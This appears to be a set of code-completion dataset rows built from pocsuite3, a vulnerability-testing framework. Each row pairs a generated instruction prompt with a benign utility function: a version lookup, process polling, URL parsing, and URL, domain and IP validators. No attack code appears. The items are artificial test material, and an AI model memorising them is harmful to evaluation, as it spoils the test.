from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def extract_regex_result(regex, content, flags=0):
"""
Returns 'result' group value from a possible match with regex on a given
content
>>> extract_regex_result(r'a(?P<result>[^g]+)g', 'abcdefg')
'bcdef'
"""
ret = None
if regex and content and "?P<result>" in regex:
match = re.search(regex, content, flags)
if match:
ret = match.group("result")
return ret
The provided code snippet includes necessary dependencies for implementing the `get_latest_revision` function. Write a Python function `def get_latest_revision()` to solve the following problem:
Retrieves latest revision from the offical repository
Here is the function:
def get_latest_revision():
"""
Retrieves latest revision from the offical repository
"""
ret = None
resp = requests.get(url="https://raw.githubusercontent.com/knownsec/pocsuite3/master/pocsuite3/__init__.py")
try:
content = resp.content
ret = extract_regex_result(r"__version__\s*=\s*[\"'](?P<result>[\d.]+)", content)
except Exception:
pass
return ret | Retrieves latest revision from the offical repository |
161,786 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def data_to_stdout(data, bold=False):
"""
Writes text to the stdout (console) stream
"""
if not conf.get('quiet', False):
message = ""
if isinstance(data, str):
message = stdout_encode(data)
else:
message = data
sys.stdout.write(set_color(message, bold))
try:
sys.stdout.flush()
except IOError:
pass
return
The provided code snippet includes necessary dependencies for implementing the `poll_process` function. Write a Python function `def poll_process(process, suppress_errors=False)` to solve the following problem:
Checks for process status (prints . if still running)
Here is the function:
def poll_process(process, suppress_errors=False):
"""
Checks for process status (prints . if still running)
"""
while True:
data_to_stdout(".")
time.sleep(1)
return_code = process.poll()
if return_code is not None:
if not suppress_errors:
if return_code == 0:
data_to_stdout(" done\n")
elif return_code < 0:
data_to_stdout(" process terminated by signal {}\n".format(return_code))
elif return_code > 0:
data_to_stdout(" quit unexpectedly with return code {}\n".format(return_code))
break | Checks for process status (prints . if still running) |
161,787 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
def urlparse(address):
# https://stackoverflow.com/questions/50499273/urlparse-fails-with-simple-url
try:
ip = ip_address(address)
if ip.version == 4:
return urllib.parse.urlparse(f'tcp://{address}')
elif ip.version == 6:
return urllib.parse.urlparse(f'tcp://[{address}]')
except ValueError:
pass
if not re.search(r'^[A-Za-z0-9+.\-]+://', address):
address = f'tcp://{address}'
return urllib.parse.urlparse(address)
The provided code snippet includes necessary dependencies for implementing the `parse_target_url` function. Write a Python function `def parse_target_url(url)` to solve the following problem:
Parse target URL
Here is the function:
def parse_target_url(url):
"""
Parse target URL
"""
try:
pr = urlparse(url)
if pr.scheme.lower() not in ['http', 'https', 'ws', 'wss']:
url = pr._replace(scheme='https' if str(pr.port).endswith('443') else 'http').geturl()
except ValueError:
pass
return url | Parse target URL |
161,788 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
URL_ADDRESS_REGEX = r"(?:(?:https?):\/\/|www\.|ftp\.)(?:\([-a-zA-Z0-9+&@#\/%=~_|$?!:,.]*\)|[-a-zA-Z0-9+&@#\/%=~_|$?!:,.])*(?:\([-a-zA-Z0-9+&@#\/%=~_|$?!:,.]*\)|[a-zA-Z0-9+&@#\/%=~_|$])"
def is_url_format(value):
if value and re.match(URL_ADDRESS_REGEX, value):
return True
else:
return False | null |
161,789 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
URL_DOMAIN_REGEX = (
r"(?:www)?(?:[\w-]{2,255}(?:\.\w{2,6}){1,3})(?:/[\w&%?#-]{1,300})?(?:\:\d+)?"
)
def is_domain_format(value):
if value and re.match(URL_DOMAIN_REGEX, value):
return True
else:
return False | null |
161,790 | import base64
import hashlib
import inspect
import logging
import os
import re
import select
import shlex
import socket
import struct
import subprocess
import sys
import time
import collections
import chardet
import requests
import urllib
from collections import OrderedDict
from functools import wraps
from ipaddress import ip_address, ip_network
from platform import machine
from subprocess import call, Popen, PIPE
from colorama.initialise import init as coloramainit
from termcolor import colored
from pocsuite3.lib.core.convert import stdout_encode
from pocsuite3.lib.core.data import conf
from pocsuite3.lib.core.data import kb
from pocsuite3.lib.core.data import logger
from pocsuite3.lib.core.data import paths
from pocsuite3.lib.core.decorators import cachedmethod
from pocsuite3.lib.core.enums import OS_ARCH, OS
from pocsuite3.lib.core.exception import PocsuiteSystemException
from pocsuite3.lib.core.log import LOGGER_HANDLER
from pocsuite3.lib.core.settings import (
BANNER, BOLD_PATTERNS, IS_WIN, URL_DOMAIN_REGEX, LOCAL_IP_ADDRESS_REGEX,
IP_ADDRESS_WITH_PORT_REGEX, IPV6_URL_REGEX, TIMESTAMP, OS_SYSTEM)
from pocsuite3.lib.core.settings import IPV6_ADDRESS_REGEX
from pocsuite3.lib.core.settings import IP_ADDRESS_REGEX
from pocsuite3.lib.core.settings import OLD_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POCSUITE_VERSION_CHARACTER
from pocsuite3.lib.core.settings import POC_REQUIRES_REGEX
from pocsuite3.lib.core.settings import UNICODE_ENCODING
from pocsuite3.lib.core.settings import URL_ADDRESS_REGEX
IP_ADDRESS_REGEX = r"\b(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\b"
def is_ip_address_format(value):
if value and re.match(IP_ADDRESS_REGEX, value):
return True
else:
return False | null |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.